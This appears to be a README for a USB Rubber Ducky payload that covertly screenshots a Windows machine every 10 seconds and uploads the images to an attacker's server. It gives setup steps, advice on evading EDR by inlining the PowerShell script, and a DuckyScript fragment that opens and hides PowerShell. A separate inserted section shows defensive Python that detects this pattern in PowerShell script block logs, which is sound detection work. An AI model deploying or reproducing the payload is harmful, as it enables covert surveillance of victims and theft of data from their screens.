Windows Screenshot Exfiltration Payload
Overview
This payload captures screenshots from a Windows machine every 10 seconds and uploads them to a specified server using PowerShell. The payload is designed to run until the PowerShell window is closed or the loop is broken out of.
Features
- Target OS: Windows 10, 11
- Exfiltration Method: Screenshots are taken and uploaded to a server every 10 seconds.
- Detection and Execution: Automatically detects if the target OS is Windows and executes the payload accordingly.
- HID Emulation: Emulates a Lenovo keyboard with a random serial number.
- Fallback: If the OS is not Windows, the USB Rubber Ducky will function as a storage device.
Files
- payload.txt: The main script that is deployed to the USB Rubber Ducky.
- script.ps1: The staged PowerShell script that takes screenshots and uploads them to the server.
Setup Instructions
- Server Setup: Set up a server to receive the uploaded screenshots and host the script.ps1 file. I used IngoKl/HTTPUploadExfil as it is pretty easy to set up.
- Update URLs: Modify script.ps1 to include your server URL where the screenshots will be uploaded, and modify payload.txt to reference the URL of the hosted script.ps1. The two values to change are:
  - $url in script.ps1
  - #MY_STAGED_SCRIPT in payload.txt
- Upload Files:
  - Inject payload.txt on the USB Rubber Ducky.
  - Host script.ps1 on a web server.
Note: In the provided files, the example URLs are followed by /l in the payload and by /p for the sending of screenshots; this is because I use HTTPUploadExfil. Modify this if you do not use the same exfil server as I do.
Usage
Payload Execution
- Insert USB Rubber Ducky: Plug the USB Rubber Ducky into the target machine.
- OS Detection: The payload automatically detects if the target OS is Windows.
- Payload Deployment:
- If Windows is detected, it emulates a Lenovo keyboard, opens PowerShell, and runs the PowerShell script.
- If the target OS is not Windows, it switches to storage mode (useful for dev purposes).
PowerShell Script Execution
The PowerShell script (script.ps1) runs the following commands:
- Takes a screenshot every 10 seconds.
- Uploads the screenshot to the specified server.
- Repeats until the PowerShell window is closed.
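From the defender's side, the three behaviours listed above (screen capture, HTTP upload, repeat) are exactly what PowerShell script block logging (Event ID 4104) records once the script is running, regardless of whether it was downloaded or typed in by the keyboard emulation. The following is an added example, not part of this project, that scans script block text for the co-occurrence of all three behaviours; the indicator lists, the record shape and the sample records are constructed for the example, and the field names (ScriptBlockId, ScriptBlockText, Path) mirror the 4104 event fields.

```python
"""Heuristic triage of PowerShell script block log text for the
capture-upload-repeat pattern. Added example; assumes script block
logging is enabled and that records are available as dicts with the
4104 field names. Sample records below are constructed, not real logs.
"""
import re

# Regexes grouped by the behaviour they indicate. Each group alone is common
# in benign administration scripts; all three in one script block is the
# pattern worth raising an alert on.
INDICATORS = {
    "capture": [r"System\.Drawing", r"CopyFromScreen", r"Graphics\]::FromImage"],
    "upload": [r"Invoke-WebRequest", r"Invoke-RestMethod", r"\.UploadFile\(",
               r"Net\.WebClient", r"HttpClient"],
    "repeat": [r"\bwhile\s*\(", r"\bfor\s*\(", r"\bdo\s*\{", r"Start-Sleep"],
}


def matched_groups(script_text):
    """Return {group: [patterns that matched]} for one script block."""
    hits = {}
    for group, patterns in INDICATORS.items():
        found = [p for p in patterns if re.search(p, script_text, re.IGNORECASE)]
        if found:
            hits[group] = found
    return hits


def is_screenshot_exfil_candidate(script_text):
    """True only when capture, upload and repeat indicators all appear."""
    return set(matched_groups(script_text)) == set(INDICATORS)


def scan_script_blocks(records):
    """Return the ScriptBlockIds of records matching the full pattern."""
    return [r["ScriptBlockId"] for r in records
            if is_screenshot_exfil_candidate(r["ScriptBlockText"])]


# Constructed sample records in the shape of Event ID 4104 fields.
# Placeholders such as <redacted> stand in for values a real log would hold.
SAMPLE_RECORDS = [
    {"ScriptBlockId": "sb-0001", "Path": "", "ScriptBlockText": (
        "Add-Type -AssemblyName System.Drawing; "
        "while ($true) { $g.CopyFromScreen(...) ; "
        "Invoke-WebRequest -Uri <redacted> -Method Post -InFile <file> ; "
        "Start-Sleep -Seconds 10 }")},
    # Benign: polls an API in a loop, never touches the screen.
    {"ScriptBlockId": "sb-0002", "Path": "C:\\ops\\poll.ps1", "ScriptBlockText": (
        "while ($true) { Invoke-RestMethod -Uri <api> ; Start-Sleep -Seconds 60 }")},
    # Benign: draws a chart with System.Drawing, no network activity.
    {"ScriptBlockId": "sb-0003", "Path": "C:\\ops\\chart.ps1", "ScriptBlockText": (
        "Add-Type -AssemblyName System.Drawing; "
        "$bmp = New-Object System.Drawing.Bitmap 200,100; "
        "$bmp.Save('C:\\temp\\chart.png')")},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec["ScriptBlockId"], matched_groups(rec["ScriptBlockText"]))
    print("flagged:", scan_script_blocks(SAMPLE_RECORDS))
```

Requiring all three groups keeps the false-positive rate low on ordinary admin scripts (sb-0002 and sb-0003 each trip one or two groups but are not flagged). The check is string-based, so heavily obfuscated script text can slip past it; in practice it is a triage filter to run over 4104 records, with an empty Path (script block not backed by a file on disk, as in sb-0001) being a useful secondary signal.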
Alternative
Some EDRs detect the download of a PowerShell script from the internet, which could lead to the payload being blocked. As an alternative, you could take the content of script.ps1 and put it directly in the payload.
GUI r
DELAY 500
STRINGLN powershell
DELAY 500
STRINGLN
[... The content of script.ps1 here ...]
END_STRINGLN
ENTER
DELAY 500
ALT SPACE
STRING n